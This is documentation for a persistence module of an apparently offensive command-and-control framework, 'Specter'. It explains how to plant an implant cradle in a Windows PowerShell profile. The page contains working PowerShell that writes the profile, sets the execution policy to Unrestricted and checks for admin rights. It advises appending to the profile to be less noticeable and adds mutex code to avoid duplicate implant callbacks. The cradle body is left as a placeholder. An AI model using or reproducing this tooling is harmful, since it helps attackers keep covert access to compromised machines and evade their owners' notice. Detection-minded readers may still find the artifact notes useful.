Persistence with PowerShell Profile and PowerShell Cradle

Description

Establishes user- or system-level persistence by creating or overwriting a PowerShell profile and inserting a Specter cradle.

Overview

A PowerShell profile is a script that runs every time a PowerShell host starts. It is normally used, much like a logon script, to customize the environment; here it is used for persistent access. This script establishes user- or system-level persistence by creating or overwriting a PowerShell profile and inserting a Specter cradle. The operator can specify either a “User” or “System” profile. The “User” profile corresponds to the Current User, All Hosts profile ($PROFILE.CurrentUserAllHosts). The “System” profile corresponds to the All Users, All Hosts profile ($PROFILE.AllUsersAllHosts), which lives under the PowerShell installation directory and requires Administrator privileges to modify.

This script also sets the PowerShell execution policy to Unrestricted, scoped to CurrentUser when the User profile is selected or LocalMachine when the System profile is selected. Profiles are subject to the execution policy like any other script, so without a policy that permits script execution PowerShell will refuse to load the profile and the cradle will never run.
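The procedure above, as an added PowerShell example that is not part of the Specter module: it resolves the profile path for the chosen scope, enforces the Administrators requirement for the System profile, sets the execution policy at the matching scope, writes the cradle, and returns an object in the same shape as the module's output. The cradle text, the build identifier and the function name are placeholders chosen for the example; Specter's real cradle is not reproduced here.

```powershell
# Added example, not Specter's own code. $Cradle and $Build are assumed placeholders.
function Install-ProfilePersistence {
    [CmdletBinding()]
    param(
        [ValidateSet('User', 'System')]
        [string]$Profile = 'User',
        [string]$Build   = 'example-build-id',                       # assumed build identifier
        [string]$Cradle  = "# <cradle for build $Build would go here>" # assumed cradle body
    )

    # User  -> Current User, All Hosts   (Documents\WindowsPowerShell\profile.ps1)
    # System -> All Users, All Hosts     ($PSHOME\profile.ps1), Administrators only
    $path  = if ($Profile -eq 'User') { $PROFILE.CurrentUserAllHosts } else { $PROFILE.AllUsersAllHosts }
    $scope = if ($Profile -eq 'User') { 'CurrentUser' } else { 'LocalMachine' }

    if ($Profile -eq 'System') {
        $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
        $principal = New-Object Security.Principal.WindowsPrincipal($identity)
        if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
            throw 'The System profile requires membership in the Administrators group.'
        }
    }

    # Profiles are scripts: with the default Restricted policy they are silently skipped.
    # LocalMachine scope needs an elevated host, which the check above guarantees.
    Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope $scope -Force

    # Create the containing directory if needed. The module on this page overwrites the
    # profile; appending instead preserves a user's existing profile and is less noticeable.
    New-Item -ItemType Directory -Path (Split-Path -Parent $path) -Force | Out-Null
    Add-Content -LiteralPath $path -Value $Cradle -Encoding UTF8

    [PSCustomObject]@{
        Persistence = [PSCustomObject]@{
            Method      = 'PowerShell Profile'
            Trigger     = 'PowerShell Host Startup'
            Build       = $Build
            Profile     = $Profile
            Event       = 'Create'
            Success     = (Test-Path -LiteralPath $path)
            ProfilePath = $path
        }
    }
}

# Usage: Install-ProfilePersistence -Profile User -Build '92cb...' -Cradle '<cradle text>'
```

The returned object deliberately omits the UninstallScript field; removal is just deleting the file at ProfilePath, as the example output below shows. Note that the execution policy change is itself a visible artifact: it is written to HKCU or HKLM under Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell and survives removal of the profile unless reverted separately.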

Arguments

Parameter | Type   | Description
Profile   | string | The PowerShell profile type to use for persistence: "User" (Current User, All Hosts) or "System" (All Users, All Hosts). The User profile only runs when a PowerShell host is started in the context of the current user.
Build     | string | The Specter build identifier.

Dependencies

  • None

Operating Systems

  • Windows

Pre-Requisites

  • If using the System profile, the current user must be a member of the Administrators group.

Employment Considerations

  • Every PowerShell host that starts (interactive consoles, ISE, scheduled scripts, other tooling that spawns PowerShell) loads the profile, so on a busy system you may flood the C2 server with implant callbacks and duplicate sessions. It may be worth building an implant that burns off (exits immediately) if a Specter is already running.
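One way to implement the burn-off described above, as an added example that is not part of the Specter module or its cradle: the cradle first tries to create a named mutex and exits if another process already holds it. The mutex name and the surrounding cradle body are assumptions for the example.

```powershell
# Added example, not Specter's own code. The mutex name is an assumed placeholder.
function Test-ImplantAlreadyRunning {
    param(
        # Global\ so that hosts in every session see it, which matters for the System profile.
        [string]$MutexName = 'Global\ExampleImplantGuard'
    )
    $createdNew = $false
    try {
        $mutex = New-Object System.Threading.Mutex($true, $MutexName, [ref]$createdNew)
    } catch [System.UnauthorizedAccessException] {
        # The mutex exists but was created by another account and we cannot open it:
        # an implant is already running somewhere on the box, so burn off.
        return $true
    }
    if (-not $createdNew) {
        # Another process owns it: release our handle and report "already running".
        $mutex.Dispose()
        return $true
    }
    # We created it; keep the handle alive for the life of this process so that later
    # hosts see it. Store it in script scope so the profile does not drop the reference.
    $script:ImplantGuardMutex = $mutex
    return $false
}

# In the profile script, 'return' ends the profile quietly without affecting the host.
if (Test-ImplantAlreadyRunning) { return }

# <cradle body would follow here; it runs only in the first host to claim the mutex>
```

The guard is tied to the lifetime of the process that created the mutex. If the cradle runs the implant inside the PowerShell host, closing that host releases the mutex and the next host re-stages, which is usually the desired behaviour. If the cradle instead spawns a separate implant process, the implant process should hold the mutex, otherwise the guard only lasts as long as the shell that launched it.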

Example Output

[
  {
    "Persistence": {
      "Id": "2ba39fdc872b4f4e9c3635ff1cdc182f",
      "Method": "PowerShell Profile",
      "Trigger": "PowerShell Host Startup",
      "Build": "92cbf1b0f92642859f28f258226cc1f3",
      "Profile": "User",
      "Event": "Create",
      "Success": true,
      "UninstallScript": "try {\r\n\t[System.IO.File]::Delete('C:\\Users\\helpdesk\\Documents\\WindowsPowerShell\\profile.ps1');\r\n\t$success = $true;\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"1724650fe73f4328b127d015631e34e3\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"PowerShell Profile\";\r\n\t    Profile = \"User\";\r\n\t    Trigger = \"PowerShell Host Startup\";\r\n\t}\r\n}",
      "ProfilePath": "C:\\Users\\helpdesk\\Documents\\WindowsPowerShell\\profile.ps1"
    }
  }
]
